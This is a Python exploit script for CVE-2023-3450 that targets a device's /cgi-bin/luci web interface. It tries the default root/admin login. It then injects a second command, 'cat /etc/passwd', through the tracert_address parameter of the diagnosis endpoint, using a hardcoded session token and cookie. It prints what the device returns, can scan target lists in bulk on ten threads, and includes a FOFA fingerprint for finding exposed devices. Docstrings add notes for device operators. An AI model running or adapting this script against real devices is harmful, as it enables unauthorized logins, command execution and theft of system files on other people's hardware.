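# -*- coding:utf-8 -*-
"""Two-stage check of a device's `/cgi-bin/luci` web interface for CVE-2023-3450.

Stage 1 (`poc`) requests `/cgi-bin/luci` with the account pair `u=root` /
`p=admin` in the query string and treats a response body containing "ok" as a
successful login. Stage 2 (`exp`) requests the `admin/diagnosis` endpoint with
a `tracert_address` value that appends a second command after `127.0.0.1;`
and looks for "root" in the response.

Notes for operators of affected devices, derived from the requests below:

* A device that passes stage 1 still accepts the root/admin pair and needs
  its password changed, whatever stage 2 reports.
* Both requests are visible in web or proxy logs: `u=root&p=admin` on
  `/cgi-bin/luci`, and `tracert_address` values containing `;` (`%3B`) on
  `/admin/diagnosis`.
* The management interface should not be reachable from untrusted networks.
"""
import argparse
import base64
import re
import sys
from multiprocessing.dummy import Pool

import requests

# Every request below is sent with verify=False; this silences the resulting
# urllib3 InsecureRequestWarning. TLS certificates are therefore NOT checked.
requests.packages.urllib3.disable_warnings()

# Asset-inventory fingerprint (FOFA favicon hash): icon_hash="-399311436"
# Target format example: http://DEVICE_IP:PORT  (placeholder, not a real host)

# Headers shared by both requests.
_BASE_HEADERS = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36',
    'Accept-Encoding': 'gzip, deflate'
}


def banner():
    """Print the ASCII-art "CVE-2023-3450" banner."""
    content = '''
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗      ██████╗ ██╗  ██╗███████╗ ██████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗     ╚════██╗██║  ██║██╔════╝██╔═████╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗█████╔╝███████║███████╗██║██╔██║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝╚═══██╗╚════██║╚════██║████╔╝██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝     ██████╔╝     ██║███████║╚██████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝      ╚═════╝      ╚═╝╚══════╝ ╚═════╝
'''
    print(content)


def poc(target):
    """Report whether `target` accepts the root/admin account pair.

    Args:
        target: Base URL of the device, e.g. ``http://example.com``.

    Returns:
        True when the response body contains "ok" (the target is then also
        appended to ``result.txt``); False otherwise, including when the
        request itself fails.
    """
    # The credentials travel in the query string, so they end up in any
    # access log or proxy log along the path.
    url = target + '/cgi-bin/luci?u=root&p=admin&_=0.8260737660449504'
    try:
        res = requests.get(url, headers=_BASE_HEADERS, verify=False, timeout=5).text
    except requests.RequestException:
        # Only transport/URL errors are treated as "unreachable"; a bare
        # `except:` here would also swallow KeyboardInterrupt and leave the
        # function returning None instead of a bool.
        print(f'[-]{target}无法进入')
        return False

    # NOTE(review): a bare substring match; any body that happens to contain
    # "ok" counts as a login. Treat a hit as "needs manual confirmation".
    if 'ok' in res:
        print(f'[+]{target}登录成功')
        with open('result.txt', 'a+', encoding='utf-8') as f:
            f.write(target + '\n')
        return True

    print(f'[-]{target}登陆失败')
    return False


def exp(target):
    """Report whether the diagnosis endpoint of `target` runs an appended command.

    The `tracert_address` parameter carries `127.0.0.1;cat /etc/passwd`
    (URL-encoded); the response is considered positive when it contains
    "root", and the `msg` field(s) of the response are then printed.

    Args:
        target: Base URL of the device, e.g. ``http://example.com``.

    Returns:
        None. The outcome is only printed.
    """
    # NOTE(review): the `;stok=...` path segment and the `sysauth` cookie are
    # fixed values, not obtained from the login done in poc(). Whether a
    # given device accepts them is not visible here, so a "[-]" result from
    # this function is not evidence that the device is unaffected.
    url = target + '/cgi-bin/luci/;stok=b3bafdbb03f0dfcf96bef095f6060d64/admin/diagnosis?diag=tracert&tracert_address=127.0.0.1%3Bcat+%2Fetc%2Fpasswd&seq=0'
    headers = dict(_BASE_HEADERS)
    headers['Cookie'] = 'sysauth=2c695fe03878d9a754730dce32bfd4ca'
    try:
        res = requests.get(url, headers=headers, verify=False, timeout=5).text
    except requests.RequestException:
        # Without this guard a timeout or refused connection ends the run
        # with a traceback instead of a result line.
        print(f'[-]{target}无法进入')
        return

    # NOTE(review): "root" is a loose marker; it can also occur in an
    # ordinary page or error message.
    if 'root' in res:
        print(f'[+]{target}有命令执行漏洞')
        # The printed value is file content returned by the device; handle
        # the terminal output and any captured logs as sensitive.
        print(re.findall('msg":"(.*?)"', res))
    else:
        print(f'[-]{target}没有命令执行漏洞')


def main():
    """Parse the command line and run the check.

    ``-u URL`` runs stage 1 and, when it succeeds, stage 2 against one
    target. ``-f FILE`` reads one target per line and runs stage 1 only, on
    a pool of 10 threads. Any other combination prints a usage hint.
    """
    banner()
    parser = argparse.ArgumentParser(description='CVE-2023-3450')
    parser.add_argument('-u', '--url', dest='url', type=str, help='example:http://example.com')
    parser.add_argument('-f', '--file', dest='file', type=str, help='url.txt')
    args = parser.parse_args()

    if args.url and not args.file:
        if poc(args.url):
            exp(args.url)
    elif args.file and not args.url:
        with open(args.file, 'r', encoding='utf-8') as f:
            # Blank lines would otherwise become empty targets and produce
            # meaningless "unreachable" lines in the output.
            url_list = [line.strip() for line in f if line.strip()]
        mp = Pool(10)
        try:
            mp.map(poc, url_list)
        finally:
            # Release the worker threads even if map() raises.
            mp.close()
            mp.join()
    else:
        print(f'Usage:\n\tpython3 {sys.argv[0]} -h')


if __name__ == '__main__':
    main()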